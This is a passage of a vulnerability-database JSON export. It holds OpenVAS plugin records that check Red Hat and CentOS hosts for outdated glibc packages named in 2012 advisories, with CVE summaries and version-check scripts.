"http://plugins.openvas.org/nasl.php?oid=870556", "id": "OPENVAS:870556", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for glibc RHSA-2012:0126-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The glibc packages contain the standard C libraries used by multiple\n programs on the system. These packages contain the standard C and the\n standard math libraries. Without these two libraries, a Linux system cannot\n function properly.\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library read timezone files. If a\n carefully-crafted timezone file was loaded by an application linked against\n glibc, it could cause the application to crash or, potentially, execute\n arbitrary code with the privileges of the user running the application.\n (CVE-2009-5029)\n\n A flaw was found in the way the ldd utility identified dynamically linked\n libraries. If an attacker could trick a user into running ldd on a\n malicious binary, it could result in arbitrary code execution with the\n privileges of the user running ldd. (CVE-2009-5064)\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library loaded ELF (Executable and Linking\n Format) files. If a carefully-crafted ELF file was loaded by an\n application linked against glibc, it could cause the application to crash\n or, potentially, execute arbitrary code with the privileges of the user\n running the application. (CVE-2010-0830)\n\n It was found that the glibc addmntent() function, used by various mount\n helper utilities, did not handle certain errors correctly when updating the\n mtab (mounted file systems table) file. If such utilities had the setuid\n bit set, a local attacker could use this flaw to corrupt the mtab file.\n (CVE-2011-1089)\n\n A denial of service flaw was found in the remote procedure call (RPC)\n implementation in glibc. A remote attacker able to open a large number of\n connections to an RPC service that is using the RPC implementation from\n glibc, could use this flaw to make that service use an excessive amount of\n CPU time. (CVE-2011-4609)\n\n Red Hat would like to thank the Ubuntu Security Team for reporting\n CVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The Ubuntu\n Security Team acknowledges Dan Rosenberg as the original reporter of\n CVE-2010-0830.\n\n Users should upgrade to these updated packages, which resolve these issues.\";\n\ntag_affected = \"glibc on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2012-February/msg00027.html\");\n script_id(870556);\n script_version(\"$Revision: 8273 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-03 07:29:19 +0100 (Wed, 03 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-21 18:56:49 +0530 (Tue, 21 Feb 2012)\");\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0830\", \"CVE-2011-1089\",\n \"CVE-2011-4609\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2012:0126-01\");\n script_name(\"RedHat Update for glibc RHSA-2012:0126-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of glibc\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo\", rpm:\"glibc-debuginfo~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo-common\", rpm:\"glibc-debuginfo-common~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-06T13:06:39", "references": ["http://lists.centos.org/pipermail/centos-announce/2012-February/018428.html", "2012:0126"], "pluginID": "881084", "description": "Check for the Version of glibc", "edition": 3, "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "published": "2012-07-30T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "title": "CentOS Update for glibc CESA-2012:0126 centos5 ", "type": "openvas", "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0830", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "modified": "2018-01-05T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=881084", "id": "OPENVAS:881084", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for glibc CESA-2012:0126 centos5 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The glibc packages contain the standard C libraries used by multiple\n programs on the system. These packages contain the standard C and the\n standard math libraries. Without these two libraries, a Linux system cannot\n function properly.\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library read timezone files. If a\n carefully-crafted timezone file was loaded by an application linked against\n glibc, it could cause the application to crash or, potentially, execute\n arbitrary code with the privileges of the user running the application.\n (CVE-2009-5029)\n \n A flaw was found in the way the ldd utility identified dynamically linked\n libraries. If an attacker could trick a user into running ldd on a\n malicious binary, it could result in arbitrary code execution with the\n privileges of the user running ldd. (CVE-2009-5064)\n \n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library loaded ELF (Executable and Linking\n Format) files. If a carefully-crafted ELF file was loaded by an\n application linked against glibc, it could cause the application to crash\n or, potentially, execute arbitrary code with the privileges of the user\n running the application. (CVE-2010-0830)\n \n It was found that the glibc addmntent() function, used by various mount\n helper utilities, did not handle certain errors correctly when updating the\n mtab (mounted file systems table) file. If such utilities had the setuid\n bit set, a local attacker could use this flaw to corrupt the mtab file.\n (CVE-2011-1089)\n \n A denial of service flaw was found in the remote procedure call (RPC)\n implementation in glibc. A remote attacker able to open a large number of\n connections to an RPC service that is using the RPC implementation from\n glibc, could use this flaw to make that service use an excessive amount of\n CPU time. (CVE-2011-4609)\n \n Red Hat would like to thank the Ubuntu Security Team for reporting\n CVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The Ubuntu\n Security Team acknowledges Dan Rosenberg as the original reporter of\n CVE-2010-0830.\n \n Users should upgrade to these updated packages, which resolve these issues.\";\n\ntag_affected = \"glibc on CentOS 5\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2012-February/018428.html\");\n script_id(881084);\n script_version(\"$Revision: 8295 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 07:29:18 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:03:45 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0830\", \"CVE-2011-1089\",\n \"CVE-2011-4609\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2012:0126\");\n script_name(\"CentOS Update for glibc CESA-2012:0126 centos5 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of glibc\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.5~65.el5_7.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.5~65.el5_7.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.5~65.el5_7.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.5~65.el5_7.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.5~65.el5_7.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.5~65.el5_7.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-23T15:16:48", "references": ["https://www.redhat.com/archives/rhsa-announce/2012-February/msg00027.html", "2012:0126-01"], "pluginID": "1361412562310870556", "description": "The remote host is missing an update for the ", "edition": 6, "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "published": "2012-02-21T00:00:00", "title": "RedHat Update for glibc RHSA-2012:0126-01", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0830", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310870556", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870556", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for glibc RHSA-2012:0126-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2012-February/msg00027.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870556\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-21 18:56:49 +0530 (Tue, 21 Feb 2012)\");\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0830\", \"CVE-2011-1089\",\n \"CVE-2011-4609\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"RHSA\", value:\"2012:0126-01\");\n script_name(\"RedHat Update for glibc RHSA-2012:0126-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glibc'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_5\");\n script_tag(name:\"affected\", value:\"glibc on Red Hat Enterprise Linux (v. 5 server)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"The glibc packages contain the standard C libraries used by multiple\n programs on the system. These packages contain the standard C and the\n standard math libraries. Without these two libraries, a Linux system cannot\n function properly.\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library read timezone files. If a\n carefully-crafted timezone file was loaded by an application linked against\n glibc, it could cause the application to crash or, potentially, execute\n arbitrary code with the privileges of the user running the application.\n (CVE-2009-5029)\n\n A flaw was found in the way the ldd utility identified dynamically linked\n libraries. If an attacker could trick a user into running ldd on a\n malicious binary, it could result in arbitrary code execution with the\n privileges of the user running ldd. (CVE-2009-5064)\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library loaded ELF (Executable and Linking\n Format) files. If a carefully-crafted ELF file was loaded by an\n application linked against glibc, it could cause the application to crash\n or, potentially, execute arbitrary code with the privileges of the user\n running the application. (CVE-2010-0830)\n\n It was found that the glibc addmntent() function, used by various mount\n helper utilities, did not handle certain errors correctly when updating the\n mtab (mounted file systems table) file. If such utilities had the setuid\n bit set, a local attacker could use this flaw to corrupt the mtab file.\n (CVE-2011-1089)\n\n A denial of service flaw was found in the remote procedure call (RPC)\n implementation in glibc. A remote attacker able to open a large number of\n connections to an RPC service that is using the RPC implementation from\n glibc, could use this flaw to make that service use an excessive amount of\n CPU time. (CVE-2011-4609)\n\n Red Hat would like to thank the Ubuntu Security Team for reporting\n CVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The Ubuntu\n Security Team acknowledges Dan Rosenberg as the original reporter of\n CVE-2010-0830.\n\n Users should upgrade to these updated packages, which resolve these issues.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo\", rpm:\"glibc-debuginfo~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo-common\", rpm:\"glibc-debuginfo-common~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:02:06", "references": ["2012:0125", "http://lists.centos.org/pipermail/centos-announce/2012-February/018427.html"], "pluginID": "1361412562310881217", "description": "Check for the Version of glibc", "edition": 3, "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "published": "2012-07-30T00:00:00", "title": "CentOS Update for glibc CESA-2012:0125 centos4 ", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0296", "CVE-2011-1659", "CVE-2010-0830", "CVE-2011-1071", "CVE-2011-1095", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310881217", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881217", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for glibc CESA-2012:0125 centos4 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The glibc packages contain the standard C libraries used by multiple\n programs on the system. These packages contain the standard C and the\n standard math libraries. Without these two libraries, a Linux system cannot\n function properly.\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library read timezone files. If a\n carefully-crafted timezone file was loaded by an application linked against\n glibc, it could cause the application to crash or, potentially, execute\n arbitrary code with the privileges of the user running the application.\n (CVE-2009-5029)\n \n A flaw was found in the way the ldd utility identified dynamically linked\n libraries. If an attacker could trick a user into running ldd on a\n malicious binary, it could result in arbitrary code execution with the\n privileges of the user running ldd. (CVE-2009-5064)\n \n It was discovered that the glibc addmntent() function, used by various\n mount helper utilities, did not sanitize its input properly. A local\n attacker could possibly use this flaw to inject malformed lines into the\n mtab (mounted file systems table) file via certain setuid mount helpers, if\n the attacker were allowed to mount to an arbitrary directory under their\n control. (CVE-2010-0296)\n \n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library loaded ELF (Executable and Linking\n Format) files. If a carefully-crafted ELF file was loaded by an\n application linked against glibc, it could cause the application to crash\n or, potentially, execute arbitrary code with the privileges of the user\n running the application. (CVE-2010-0830)\n \n It was discovered that the glibc fnmatch() function did not properly\n restrict the use of alloca(). If the function was called on sufficiently\n large inputs, it could cause an application using fnmatch() to crash or,\n possibly, execute arbitrary code with the privileges of the application.\n (CVE-2011-1071)\n \n It was found that the glibc addmntent() function, used by various mount\n helper utilities, did not handle certain errors correctly when updating the\n mtab (mounted file systems table) file. If such utilities had the setuid\n bit set, a local attacker could use this flaw to corrupt the mtab file.\n (CVE-2011-1089)\n \n It was discovered that the locale command did not produce properly escaped\n output as required by the POSIX specification. If an attacker were able to\n set the locale environment variables in the environment of a script that\n performed shell evaluation on the output of the locale command, ... \n\n Description truncated, for more information please check the Reference URL\";\n\ntag_affected = \"glibc on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2012-February/018427.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881217\");\n script_version(\"$Revision: 9352 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:13:02 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:48:09 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0296\", \"CVE-2010-0830\",\n \"CVE-2011-1071\", \"CVE-2011-1089\", \"CVE-2011-1095\", \"CVE-2011-1659\",\n \"CVE-2011-4609\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2012:0125\");\n script_name(\"CentOS Update for glibc CESA-2012:0125 centos4 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of glibc\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile\", rpm:\"glibc-profile~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nptl-devel\", rpm:\"nptl-devel~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:57:24", "references": ["2012:0125", "http://lists.centos.org/pipermail/centos-announce/2012-February/018427.html"], "pluginID": "881217", "description": "Check for the Version of glibc", "edition": 3, "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "published": "2012-07-30T00:00:00", "title": "CentOS Update for glibc CESA-2012:0125 centos4 ", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0296", "CVE-2011-1659", "CVE-2010-0830", "CVE-2011-1071", "CVE-2011-1095", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "modified": "2017-12-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=881217", "id": "OPENVAS:881217", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for glibc CESA-2012:0125 centos4 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The glibc packages contain the standard C libraries used by multiple\n programs on the system. These packages contain the standard C and the\n standard math libraries. Without these two libraries, a Linux system cannot\n function properly.\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library read timezone files. If a\n carefully-crafted timezone file was loaded by an application linked against\n glibc, it could cause the application to crash or, potentially, execute\n arbitrary code with the privileges of the user running the application.\n (CVE-2009-5029)\n \n A flaw was found in the way the ldd utility identified dynamically linked\n libraries. If an attacker could trick a user into running ldd on a\n malicious binary, it could result in arbitrary code execution with the\n privileges of the user running ldd. (CVE-2009-5064)\n \n It was discovered that the glibc addmntent() function, used by various\n mount helper utilities, did not sanitize its input properly. A local\n attacker could possibly use this flaw to inject malformed lines into the\n mtab (mounted file systems table) file via certain setuid mount helpers, if\n the attacker were allowed to mount to an arbitrary directory under their\n control. (CVE-2010-0296)\n \n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library loaded ELF (Executable and Linking\n Format) files. If a carefully-crafted ELF file was loaded by an\n application linked against glibc, it could cause the application to crash\n or, potentially, execute arbitrary code with the privileges of the user\n running the application. (CVE-2010-0830)\n \n It was discovered that the glibc fnmatch() function did not properly\n restrict the use of alloca(). If the function was called on sufficiently\n large inputs, it could cause an application using fnmatch() to crash or,\n possibly, execute arbitrary code with the privileges of the application.\n (CVE-2011-1071)\n \n It was found that the glibc addmntent() function, used by various mount\n helper utilities, did not handle certain errors correctly when updating the\n mtab (mounted file systems table) file. If such utilities had the setuid\n bit set, a local attacker could use this flaw to corrupt the mtab file.\n (CVE-2011-1089)\n \n It was discovered that the locale command did not produce properly escaped\n output as required by the POSIX specification. If an attacker were able to\n set the locale environment variables in the environment of a script that\n performed shell evaluation on the output of the locale command, ... \n\n Description truncated, for more information please check the Reference 